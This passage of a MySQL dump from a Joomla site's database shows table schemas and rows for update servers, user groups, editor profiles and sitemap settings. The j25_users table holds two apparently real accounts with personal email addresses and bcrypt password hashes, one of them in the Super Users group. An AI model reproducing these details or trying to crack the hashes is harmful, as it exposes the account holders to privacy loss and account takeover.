t-LT_details.xml','',''),(6414,3,0,'Macedonian','','pkg_mk-MK','package','',0,'3.6.5.1','','https://update.joomla.org/language/details3/mk-MK_details.xml','',''),(6415,3,0,'Malay','','pkg_ms-MY','package','',0,'3.4.1.2','','https://update.joomla.org/language/details3/ms-MY_details.xml','',''),(6416,3,0,'Montenegrin','','pkg_srp-ME','package','',0,'3.3.1.2','','https://update.joomla.org/language/details3/srp-ME_details.xml','',''),(6417,3,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(6418,3,0,'Norwegian Nynorsk','','pkg_nn-NO','package','',0,'3.4.2.1','','https://update.joomla.org/language/details3/nn-NO_details.xml','',''),(6419,3,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.11.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(6420,3,0,'Polish','','pkg_pl-PL','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(6421,3,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(6422,3,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(6423,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(6424,3,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(6425,3,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(6426,3,0,'Sinhala','','pkg_si-LK','package','',0,'3.3.1.2','','https://update.joomla.org/language/details3/si-LK_details.xml','',''),(6427,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(6428,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(6429,3,0,'Spanish','','pkg_es-ES','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(6430,3,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(6431,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(6432,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(6433,3,0,'Syriac, East','','pkg_sy-IQ','package','',0,'3.4.5.1','','https://update.joomla.org/language/details3/sy-IQ_details.xml','',''),(6434,3,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(6435,3,0,'Thai','','pkg_th-TH','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(6436,3,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(6437,3,0,'Turkmen','','pkg_tk-TM','package','',0,'3.5.0.2','','https://update.joomla.org/language/details3/tk-TM_details.xml','',''),(6438,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(6439,3,0,'Vietnamese','','pkg_vi-VN','package','',0,'3.2.1.2','','https://update.joomla.org/language/details3/vi-VN_details.xml','',''),(6440,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(6441,12,10056,'JCE Editor Pro','','com_jce','component','',1,'2.6.38','','https://www.joomlacontenteditor.net/index.php?option=com_updates&view=update&format=xml&id=1&file=extension.xml','\n                https://www.joomlacontenteditor.net/news/jce-pro-2-6-38-released\n            ',''),(6442,31,0,'JCH Optimize for Joomla!','','pkg_jchoptimize','package','',0,'7.2.5','','https://www.jch-optimize.net/index.php?option=com_ars&view=update&task=stream&format=xml&id=5&file=extension.xml','https://www.jch-optimize.net/component/ars/?view=Items&release_id=683&format=html','');
/*!40000 ALTER TABLE `j25_updates` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_user_keys`
--

DROP TABLE IF EXISTS `j25_user_keys`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_user_keys` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` varchar(150) COLLATE utf8mb4_unicode_ci NOT NULL,
  `token` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `series` varchar(191) COLLATE utf8mb4_unicode_ci NOT NULL,
  `invalid` tinyint(4) NOT NULL,
  `time` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL,
  `uastring` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `series` (`series`),
  KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_user_keys`
--

LOCK TABLES `j25_user_keys` WRITE;
/*!40000 ALTER TABLE `j25_user_keys` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_user_keys` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_user_notes`
--

DROP TABLE IF EXISTS `j25_user_notes`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_user_notes` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `catid` int(10) unsigned NOT NULL DEFAULT '0',
  `subject` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `body` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `state` tinyint(3) NOT NULL DEFAULT '0',
  `checked_out` int(10) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_user_id` int(10) unsigned NOT NULL,
  `modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `review_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`id`),
  KEY `idx_user_id` (`user_id`),
  KEY `idx_category_id` (`catid`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_user_notes`
--

LOCK TABLES `j25_user_notes` WRITE;
/*!40000 ALTER TABLE `j25_user_notes` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_user_notes` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_user_profiles`
--

DROP TABLE IF EXISTS `j25_user_profiles`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_user_profiles` (
  `user_id` int(11) NOT NULL,
  `profile_key` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL,
  `profile_value` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `ordering` int(11) NOT NULL DEFAULT '0',
  UNIQUE KEY `idx_user_id_profile_key` (`user_id`,`profile_key`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci COMMENT='Simple user profile storage table';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_user_profiles`
--

LOCK TABLES `j25_user_profiles` WRITE;
/*!40000 ALTER TABLE `j25_user_profiles` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_user_profiles` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_user_usergroup_map`
--

DROP TABLE IF EXISTS `j25_user_usergroup_map`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_user_usergroup_map` (
  `user_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Foreign Key to #__users.id',
  `group_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Foreign Key to #__usergroups.id',
  PRIMARY KEY (`user_id`,`group_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_user_usergroup_map`
--

LOCK TABLES `j25_user_usergroup_map` WRITE;
/*!40000 ALTER TABLE `j25_user_usergroup_map` DISABLE KEYS */;
INSERT INTO `j25_user_usergroup_map` VALUES (62,8),(72,8);
/*!40000 ALTER TABLE `j25_user_usergroup_map` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_usergroups`
--

DROP TABLE IF EXISTS `j25_usergroups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_usergroups` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key',
  `parent_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Adjacency List Reference Id',
  `lft` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set lft.',
  `rgt` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set rgt.',
  `title` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  UNIQUE KEY `idx_usergroup_parent_title_lookup` (`parent_id`,`title`),
  KEY `idx_usergroup_title_lookup` (`title`),
  KEY `idx_usergroup_adjacency_lookup` (`parent_id`),
  KEY `idx_usergroup_nested_set_lookup` (`lft`,`rgt`) USING BTREE
) ENGINE=InnoDB AUTO_INCREMENT=9 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_usergroups`
--

LOCK TABLES `j25_usergroups` WRITE;
/*!40000 ALTER TABLE `j25_usergroups` DISABLE KEYS */;
INSERT INTO `j25_usergroups` VALUES (1,0,1,16,'Public'),(2,1,6,13,'Registered'),(3,2,7,12,'Author'),(4,3,8,11,'Editor'),(5,4,9,10,'Publisher'),(6,1,2,5,'Manager'),(7,6,3,4,'Administrator'),(8,1,14,15,'Super Users');
/*!40000 ALTER TABLE `j25_usergroups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_users`
--

DROP TABLE IF EXISTS `j25_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_users` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(400) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `username` varchar(150) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `email` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `password` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `block` tinyint(4) NOT NULL DEFAULT '0',
  `sendEmail` tinyint(4) DEFAULT '0',
  `registerDate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `lastvisitDate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `activation` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `params` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `lastResetTime` datetime NOT NULL DEFAULT '0000-00-00 00:00:00' COMMENT 'Date of last password reset',
  `resetCount` int(11) NOT NULL DEFAULT '0' COMMENT 'Count of password resets since lastResetTime',
  `otpKey` varchar(1000) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'Two factor authentication encrypted keys',
  `otep` varchar(1000) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'One time emergency passwords',
  `requireReset` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'Require user to reset password on next login',
  `authProvider` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'Name of used authentication plugin',
  PRIMARY KEY (`id`),
  UNIQUE KEY `idx_username` (`username`),
  KEY `idx_block` (`block`),
  KEY `email` (`email`),
  KEY `idx_name` (`name`(100))
) ENGINE=InnoDB AUTO_INCREMENT=73 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_users`
--

LOCK TABLES `j25_users` WRITE;
/*!40000 ALTER TABLE `j25_users` DISABLE KEYS */;
INSERT INTO `j25_users` VALUES (62,'administrator','sergeywasp','ekvatorprint@mail.ru','$2y$10$oGvKg1HSJNRWk/zBl/0rTuHdyVMOWZquTL.2DG.NbbpsD0PiBy29e',0,1,'2010-11-06 10:50:32','2022-09-19 17:14:05','','{\"admin_language\":\"ru-RU\",\"language\":\"ru-RU\",\"editor\":\"jce\",\"helpsite\":\"\",\"timezone\":\"\",\"admin_style\":\"\"}','0000-00-00 00:00:00',0,'','',0,''),(72,'aleksei','aleksei','sergeywasp7@gmail.com','$2y$10$3U7wHDqacaDjKxdktnZHBuOTcQMS2cZ2XJgytw.EW0bna5hCXf/BC',0,0,'2021-04-30 10:09:21','2022-09-20 11:22:53','','{\"admin_style\":\"\",\"admin_language\":\"\",\"language\":\"\",\"editor\":\"\",\"timezone\":\"\"}','0000-00-00 00:00:00',0,'','',0,'');
/*!40000 ALTER TABLE `j25_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_utf8_conversion`
--

DROP TABLE IF EXISTS `j25_utf8_conversion`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_utf8_conversion` (
  `converted` tinyint(4) NOT NULL DEFAULT '0'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_utf8_conversion`
--

LOCK TABLES `j25_utf8_conversion` WRITE;
/*!40000 ALTER TABLE `j25_utf8_conversion` DISABLE KEYS */;
INSERT INTO `j25_utf8_conversion` VALUES (5);
/*!40000 ALTER TABLE `j25_utf8_conversion` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_viewlevels`
--

DROP TABLE IF EXISTS `j25_viewlevels`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_viewlevels` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key',
  `title` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `rules` varchar(5120) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'JSON encoded access control.',
  PRIMARY KEY (`id`),
  UNIQUE KEY `idx_assetgroup_title_lookup` (`title`)
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_viewlevels`
--

LOCK TABLES `j25_viewlevels` WRITE;
/*!40000 ALTER TABLE `j25_viewlevels` DISABLE KEYS */;
INSERT INTO `j25_viewlevels` VALUES (1,'Public',0,'[1]'),(2,'Registered',1,'[6,2,8]'),(3,'Special',2,'[6,3,8]');
/*!40000 ALTER TABLE `j25_viewlevels` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_weblinks`
--

DROP TABLE IF EXISTS `j25_weblinks`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_weblinks` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `catid` int(11) NOT NULL DEFAULT '0',
  `title` varchar(250) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '',
  `url` varchar(250) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `description` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `hits` int(11) NOT NULL DEFAULT '0',
  `state` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `access` int(11) NOT NULL DEFAULT '1',
  `params` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `language` char(7) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int(10) unsigned NOT NULL DEFAULT '0',
  `created_by_alias` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int(10) unsigned NOT NULL DEFAULT '0',
  `metakey` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `metadesc` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `metadata` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `featured` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT 'Set if link is featured.',
  `xreference` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'A reference to enable linkages to external data sets.',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `version` int(10) unsigned NOT NULL DEFAULT '1',
  `images` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`id`),
  KEY `idx_access` (`access`),
  KEY `idx_checkout` (`checked_out`),
  KEY `idx_state` (`state`),
  KEY `idx_catid` (`catid`),
  KEY `idx_createdby` (`created_by`),
  KEY `idx_featured_catid` (`featured`,`catid`),
  KEY `idx_language` (`language`),
  KEY `idx_xreference` (`xreference`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_weblinks`
--

LOCK TABLES `j25_weblinks` WRITE;
/*!40000 ALTER TABLE `j25_weblinks` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_weblinks` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_wf_profiles`
--

DROP TABLE IF EXISTS `j25_wf_profiles`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_wf_profiles` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL,
  `description` text NOT NULL,
  `users` text NOT NULL,
  `types` text NOT NULL,
  `components` text NOT NULL,
  `area` tinyint(3) NOT NULL,
  `device` varchar(255) NOT NULL,
  `rows` text NOT NULL,
  `plugins` text NOT NULL,
  `published` tinyint(3) NOT NULL,
  `ordering` int(11) NOT NULL,
  `checked_out` tinyint(3) NOT NULL,
  `checked_out_time` datetime NOT NULL,
  `params` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_wf_profiles`
--

LOCK TABLES `j25_wf_profiles` WRITE;
/*!40000 ALTER TABLE `j25_wf_profiles` DISABLE KEYS */;
INSERT INTO `j25_wf_profiles` VALUES (1,'Default','Default Profile for all users','','6,7,3,4,5,8','',0,'desktop,tablet,phone','help,newdocument,undo,redo,spacer,bold,italic,underline,strikethrough,justifyfull,justifycenter,justifyleft,justifyright,spacer,blockquote,formatselect,styleselect,removeformat,cleanup;fontselect,fontsizeselect,forecolor,backcolor,spacer,clipboard,indent,outdent,lists,sub,sup,textcase,charmap,hr;directionality,fullscreen,preview,source,print,searchreplace,spacer,table;visualaid,visualchars,visualblocks,nonbreaking,style,xhtmlxtras,anchor,unlink,link,imgmanager,spellchecker,article','charmap,contextmenu,browser,inlinepopups,media,help,clipboard,searchreplace,directionality,fullscreen,preview,source,table,textcase,print,style,nonbreaking,visualchars,visualblocks,xhtmlxtras,imgmanager,anchor,link,spellchecker,article,lists,formatselect,styleselect,fontselect,fontsizeselect,fontcolor,hr',1,1,0,'0000-00-00 00:00:00','{\"editor\":{\"verify_html\":\"0\",\"allow_javascript\":\"1\",\"allow_css\":\"1\",\"allow_php\":\"1\",\"extended_elements\":\"iframe\"}}'),(2,'Front End','Sample Front-end Profile','','3,4,5','',1,'desktop,tablet,phone','help,newdocument,undo,redo,spacer,bold,italic,underline,strikethrough,justifyfull,justifycenter,justifyleft,justifyright,spacer,formatselect,styleselect;clipboard,searchreplace,indent,outdent,lists,cleanup,charmap,removeformat,hr,sub,sup,textcase,nonbreaking,visualchars,visualblocks;fullscreen,preview,print,visualaid,style,xhtmlxtras,anchor,unlink,link,imgmanager,spellchecker,article','charmap,contextmenu,inlinepopups,help,clipboard,searchreplace,fullscreen,preview,print,style,textcase,nonbreaking,visualchars,visualblocks,xhtmlxtras,imgmanager,anchor,link,spellchecker,article,lists,formatselect,styleselect,hr',0,2,0,'0000-00-00 00:00:00',''),(3,'Blogger','Simple Blogging Profile','','3,4,5,6,8,7','',0,'desktop,tablet,phone','bold,italic,strikethrough,lists,blockquote,spacer,justifyleft,justifycenter,justifyright,spacer,link,unlink,imgmanager,article,spellchecker,fullscreen,kitchensink;formatselect,styleselect,underline,justifyfull,clipboard,removeformat,charmap,indent,outdent,undo,redo,help','link,imgmanager,article,spellchecker,fullscreen,kitchensink,clipboard,contextmenu,inlinepopups,lists,formatselect,styleselect',0,3,0,'0000-00-00 00:00:00','{\"editor\":{\"toggle\":\"0\"}}'),(4,'Mobile','Sample Mobile Profile','','3,4,5,6,8,7','',0,'tablet,phone','undo,redo,spacer,bold,italic,underline,formatselect,spacer,justifyleft,justifycenter,justifyfull,justifyright,spacer,fullscreen,kitchensink;styleselect,lists,spellchecker,article,link,unlink','fullscreen,kitchensink,spellchecker,article,link,inlinepopups,lists,formatselect,styleselect',0,4,0,'0000-00-00 00:00:00','{\"editor\":{\"toolbar_theme\":\"mobile\",\"resizing\":\"0\",\"resize_horizontal\":\"0\",\"resizing_use_cookie\":\"0\",\"toggle\":\"0\",\"links\":{\"popups\":{\"default\":\"\",\"jcemediabox\":{\"enable\":\"0\"},\"window\":{\"enable\":\"0\"}}}}}');
/*!40000 ALTER TABLE `j25_wf_profiles` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_xmap`
--

DROP TABLE IF EXISTS `j25_xmap`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_xmap` (
  `name` varchar(30) NOT NULL,
  `value` varchar(100) DEFAULT NULL,
  PRIMARY KEY (`name`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_xmap`
--

LOCK TABLES `j25_xmap` WRITE;
/*!40000 ALTER TABLE `j25_xmap` DISABLE KEYS */;
INSERT INTO `j25_xmap` VALUES ('version','1.2.10'),('classname','sitemap'),('expand_category','1'),('expand_section','1'),('show_menutitle','1'),('columns','1'),('exlinks','1'),('ext_image','img_grey.gif'),('exclmenus',''),('includelink','1'),('sitemap_default','1'),('exclude_css','0'),('exclude_xsl','0');
/*!40000 ALTER TABLE `j25_xmap` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_xmap_ext`
--

DROP TABLE IF EXISTS `j25_xmap_ext`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_xmap_ext` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `extension` varchar(100) NOT NULL,
  `published` int(1) DEFAULT '0',
  `params` text,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=35 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_xmap_ext`
--

LOCK TABLES `j25_xmap_ext` WRITE;
/*!40000 ALTER TABLE `j25_xmap_ext` DISABLE KEYS */;
INSERT INTO `j25_xmap_ext` VALUES (1,'com_acymailing',1,'-1{include_mails=1\nmax_mails=\ncat_priority=-1\ncat_changefreq=-1\nmail_priority=-1\nmail_changefreq=-1\n}'),(2,'com_agora',1,'-1{include_forums=1\ninclude_topics=1\nmax_topics=\nmax_age=\ncat_priority=-1\ncat_changefreq=-1\nforum_priority=-1\nforum_changefreq=-1\ntopic_priority=-1\ntopic_changefreq=-1\n}'),(3,'com_contact',1,'-1{include_contacts=1\nmax_contacts=\ncat_priority=-1\ncat_changefreq=-1\ncontact_priority=-1\ncontact_changefreq=-1\n}'),(4,'com_content',1,'-1{expand_categories=1\nexpand_sections=1\narticles_order=menu\nadd_pagebreaks=1\nadd_images=0\nmax_images=1000\nshow_unauth=0\nmax_art=0\nmax_art_age=0\ncat_priority=-1\ncat_changefreq=-1\nart_priority=-1\nart_changefreq=-1\nkeywords=1\n}'),(5,'com_docman',1,'-1{include_docs=1\ndoc_task=\ncat_priority=0.5\ncat_changefreq=weekly\ndoc_priority=0.5\ndoc_changefreq=weekly\n}'),(6,'com_eventlist',1,'-1{include_events=1\nmax_events=\nmax_age=\ncat_priority=-1\ncat_changefreq=-1\nfile_priority=-1\nfile_changefreq=-1\n}'),(7,'com_g2bridge',1,'-1{include_items=2\ncat_priority=-1\ncat_changefreq=-1\nitem_priority=-1\nitem_changefreq=-1\n}'),(8,'com_glossary',1,'-1{include_entries=1\nmax_entries=\nletter_priority=0.5\nletter_changefreq=weekly\nentry_priority=0.5\nentry_changefreq=weekly\n}'),(9,'com_hotproperty',1,'-1{include_properties=1\ninclude_companies=1\ninclude_agents=1\nproperties_text=Properties\ncompanies_text=Companies\nagents_text=Agents\nmax_properties=\ntype_priority=-1\ntype_changefreq=-1\nproperty_priority=-1\nproperty_changefreq=-1\ncompany_priority=-1\ncompany_changefreq=-1\nagent_priority=-1\nagent_changefreq=-1\n}'),(10,'com_jcalpro',1,'-1{include_events=1\ncat_priority=-1\ncat_changefreq=-1\nevent_priority=-1\nevent_changefreq=-1\n}'),(11,'com_jdownloads',1,'-1{include_files=1\nmax_files=\nmax_age=\ncat_priority=-1\ncat_changefreq=-1\nfile_priority=-1\nfile_changefreq=-1\n}'),(12,'com_jevents',1,'-1{include_events=1\nmax_events=\ncat_priority=0.5\ncat_changefreq=weekly\nevent_priority=0.5\nevent_changefreq=weekly\n}'),(13,'com_jmovies',1,'-1{include_movies=1\nmax_movies=\nmax_age=\ncat_priority=-1\ncat_changefreq=-1\nfile_priority=-1\nfile_changefreq=-1\n}'),(14,'com_jomres',1,'-1{priority=0.5\nchangefreq=weekly\n}'),(15,'com_joomdoc',1,'-1{include_docs=1\ndoc_task=\ncat_priority=0.5\ncat_changefreq=weekly\ndoc_priority=0.5\ndoc_changefreq=weekly\n}'),(16,'com_joomgallery',1,'-1{include_pictures=1\nmax_pictures=\ncat_priority=-1\ncat_changefreq=-1\npictures_priority=-1\npictures_changefreq=-1\n}'),(17,'com_kb',1,'-1{include_articles=1\ninclude_feeds=1\nmax_articles=\nmax_age=\ncat_priority=-1\ncat_changefreq=-1\nfile_priority=-1\nfile_changefreq=-1\n}'),(18,'com_kunena',1,'-1{include_topics=1\nmax_topics=\nmax_age=\ncat_priority=-1\ncat_changefreq=-1\ntopic_priority=-1\ntopic_changefreq=-1\n}'),(19,'com_lknanswers',1,'-1{include_files=1\nmax_questions=\nmax_age=\ncat_priority=-1\ncat_changefreq=-1\nquestion_priority=-1\nquestion_changefreq=-1\n}'),(20,'com_mtree',1,'-1{cats_order=cat_name\ninclude_links=1\nlinks_order=ordering\nmax_links=\nmax_age=\ncat_priority=0.5\ncat_changefreq=weekly\nlink_priority=0.5\nlink_changefreq=weekly\n}'),(21,'com_myblog',1,'-1{include_bloggers=1\ninclude_tag_clouds=1\ninclude_feed=2\ninclude_archives=2\nnumber_of_bloggers=8\ninclude_blogger_posts=1\nnumber_of_post_per_blogger=32\ntext_bloggers=Bloggers\nblogger_priority=-1\nblogger_changefreq=-1\nfeed_priority=-1\nfeed_changefreq=-1\nentry_priority=-1\nentry_changefreq=-1\ncats_priority=-1\ncats_changefreq=-1\narc_priority=-1\narc_changefreq=-1\ntag_priority=-1\ntag_changefreq=-1\n}'),(22,'com_rapidrecipe',1,'-1{cats_order=cat_name\ninclude_links=1\nlinks_order=ordering\nmax_links=\nmax_age=\ncat_priority=-1\ncat_changefreq=-1\nrecipe_priority=-1\nrecipe_changefreq=-1\n}'),(23,'com_remository',1,'-1{include_files=1\nmax_files=\nmax_age=\ncat_priority=-1\ncat_changefreq=-1\nfile_priority=-1\nfile_changefreq=-1\n}